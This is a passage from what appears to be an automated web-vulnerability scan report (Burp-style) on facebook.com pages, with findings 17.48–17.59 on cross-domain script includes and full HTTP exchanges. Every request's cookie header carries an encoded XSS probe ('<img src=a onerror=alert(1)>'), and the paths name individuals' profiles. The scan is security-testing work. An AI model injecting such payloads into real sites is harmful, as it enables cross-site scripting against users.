P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.48. http://www.facebook.com/ladonna.lokey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ladonna.lokey

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.49. http://www.facebook.com/lakendra.roberts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /lakendra.roberts

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.50. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.51. http://www.facebook.com/matthew.oliveira2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /matthew.oliveira2

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.52. http://www.facebook.com/mmafighting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mmafighting

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /mmafighting HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.164.73
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 198589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.53. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.54. http://www.facebook.com/pages/Barnesville/115038011847083

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Barnesville/115038011847083

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Barnesville/115038011847083 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.47
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.55. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Beacon-of-Hope-Resource-Center/34194116820 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.43
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 129142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.56. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Bernicks-Pepsi/123296084349478

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Bernicks-Pepsi/123296084349478 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.35
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.57. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Blaine-Senior-High/106189406087059

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Blaine-Senior-High/106189406087059 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.81
Connection: close
Date: Thu, 05 May 2011 11:42:01 GMT
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.58. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Editor-in-Chief/137829579583400

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Editor-in-Chief/137829579583400 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.75
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.59. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Gilco-Corporation/109823499042436

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Gilco-Corporation/109823499042436 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.156.75
Connection: close
Date: Thu, 05 May 2011 11:41:52 GMT
Content-Length: 26978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

